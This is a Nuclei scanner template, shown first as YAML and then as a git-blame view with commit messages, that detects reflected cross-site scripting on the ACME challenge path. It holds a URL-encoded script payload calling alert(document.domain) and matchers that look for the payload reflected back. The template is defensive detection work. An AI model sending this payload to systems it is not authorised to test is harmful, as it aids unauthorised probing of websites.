nuclei-templates/vulnerabilities/other/acme-xss.yaml

id: acme-xss

info:
  name: ACME / Let's Encrypt Reflected XSS
  author: pd-team
  severity: low
  tags: xss,acme

requests:
  - method: GET
    path:
      - '{{BaseURL}}/.well-known/acme-challenge/%3C%3fxml%20version=%221.0%22%3f%3E%3Cx:script%20xmlns:x=%22http://www.w3.org/1999/xhtml%22%3Ealert%28document.domain%26%23x29%3B%3C/x:script%3E'

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "<?xml version=\"1.0\"?><x:script xmlns:x=\"http://www.w3.org/1999/xhtml\">alert(document.domain&#x29;</x:script>"
      - type: word
        words:
          - "/xml"
          - "/html"
Massive template checks addition :tada: :tada: 2021-01-10 13:11:25 +00:00			`id: acme-xss`

			`info:`
			`name: ACME / Let's Encrypt Reflected XSS`
fixes and updates 2021-01-10 14:15:36 +00:00			`author: pd-team`
Massive template checks addition :tada: :tada: 2021-01-10 13:11:25 +00:00			`severity: low`
Adding tags to vulnerabilities and workflows 2021-02-12 05:53:01 +00:00			`tags: xss,acme`
Massive template checks addition :tada: :tada: 2021-01-10 13:11:25 +00:00
			`requests:`
			`- method: GET`
			`path:`
			`- '{{BaseURL}}/.well-known/acme-challenge/%3C%3fxml%20version=%221.0%22%3f%3E%3Cx:script%20xmlns:x=%22http://www.w3.org/1999/xhtml%22%3Ealert%28document.domain%26%23x29%3B%3C/x:script%3E'`
linting errors 2021-01-10 22:01:24 +00:00
			`matchers-condition: and`
Massive template checks addition :tada: :tada: 2021-01-10 13:11:25 +00:00			`matchers:`
			`- type: word`
			`words:`
			`- "<?xml version=\"1.0\"?><x:script xmlns:x=\"http://www.w3.org/1999/xhtml\">alert(document.domain)</x:script>"`
			`- type: word`
linting errors 2021-01-10 22:01:24 +00:00			`words:`
Massive template checks addition :tada: :tada: 2021-01-10 13:11:25 +00:00			`- "/xml"`
			`- "/html"`